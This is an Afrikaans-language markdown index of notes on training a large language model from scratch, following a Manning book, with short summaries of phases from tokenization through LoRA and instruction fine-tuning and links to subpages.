# LLM Opleiding - Data Voorbereiding
|
|
||||||
|
|
||||||
**Dit is my aantekeninge uit die baie aanbevole boek** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **met 'n paar ekstra inligting.**
|
|
||||||
|
|
||||||
## Basiese Inligting
|
|
||||||
|
|
||||||
Jy moet begin deur hierdie pos te lees vir 'n paar basiese konsepte wat jy moet weet:
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
0.-basic-llm-concepts.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 1. Tokenisering
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie aanvanklike fase is baie eenvoudig: **Verdeel die invoer in tokens (ids) op 'n manier wat sin maak**.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
1.-tokenizing.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 2. Data Monsters
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie tweede fase is baie eenvoudig: **Monster die invoerdata en berei dit voor vir die opleidingsfase deur gewoonlik die datastel in sinne van 'n spesifieke lengte te skei en ook die verwagte reaksie te genereer.**
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
2.-data-sampling.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 3. Token Inbedings
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie derde fase is baie eenvoudig: **Ken elkeen van die vorige tokens in die woordeskat 'n vektor van die verlangde dimensies toe om die model te oefen.** Elke woord in die woordeskat sal 'n punt in 'n ruimte van X dimensies wees.\
|
|
||||||
> Let daarop dat die posisie van elke woord in die ruimte aanvanklik net "ewekansig" geinitialiseer word en hierdie posisies is opleibare parameters (sal verbeter word tydens die opleiding).
|
|
||||||
>
|
|
||||||
> Boonop, tydens die token inbedding **word 'n ander laag van inbedings geskep** wat (in hierdie geval) die **absolute posisie van die woord in die opleidingssin** verteenwoordig. Op hierdie manier sal 'n woord in verskillende posisies in die sin 'n ander voorstelling (betekenis) hê.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
3.-token-embeddings.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 4. Aandag Meganismes
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie vierde fase is baie eenvoudig: **Pas 'n paar aandag meganismes toe**. Hierdie gaan baie **herhaalde lae** wees wat die **verhouding van 'n woord in die woordeskat met sy bure in die huidige sin wat gebruik word om die LLM op te lei, vasvang**.\
|
|
||||||
> 'n Baie lae word hiervoor gebruik, so 'n baie opleibare parameters gaan hierdie inligting vasvang.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
4.-attention-mechanisms.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 5. LLM Argitektuur
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie vyfde fase is baie eenvoudig: **Ontwikkel die argitektuur van die volle LLM**. Sit alles saam, pas al die lae toe en skep al die funksies om teks te genereer of teks na IDs en terug te transformeer.
|
|
||||||
>
|
|
||||||
> Hierdie argitektuur sal vir beide, opleiding en voorspellings van teks gebruik word nadat dit opgelei is.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
5.-llm-architecture.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 6. Voor-Opleiding & Laai modelle
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie sesde fase is baie eenvoudig: **Oefen die model van nuuts af**. Hiervoor sal die vorige LLM argitektuur gebruik word met 'n paar lusse wat oor die datastelle gaan met die gedefinieerde verliesfunksies en optimizer om al die parameters van die model op te lei.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
6.-pre-training-and-loading-models.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 7.0. LoRA Verbeterings in fyn-afstemming
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die gebruik van **LoRA verminder baie die berekening** wat nodig is om **fyn af te stel** reeds opgeleide modelle.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
7.0.-lora-improvements-in-fine-tuning.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 7.1. Fyn-Afstemming vir Kategorisering
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie afdeling is om te wys hoe om 'n reeds voor-opgeleide model fyn af te stel sodat in plaas daarvan om nuwe teks te genereer, die LLM die **waarskynlikhede van die gegewe teks om in elkeen van die gegewe kategorieë gekategoriseer te word** (soos of 'n teks spam is of nie) sal gee.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
7.1.-fine-tuning-for-classification.md
|
|
||||||
{{#endref}}
|
|
||||||
|
|
||||||
## 7.2. Fyn-Afstemming om Instruksies te Volg
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie afdeling is om te wys hoe om **'n reeds voor-opgeleide model fyn af te stel om instruksies te volg** eerder as net om teks te genereer, byvoorbeeld, om op take as 'n chat bot te reageer.
|
|
||||||
|
|
||||||
{{#ref}}
|
|
||||||
7.2.-fine-tuning-to-follow-instructions.md
|
|
||||||
{{#endref}}
|
|
Loading…
x
Reference in New Issue
Block a user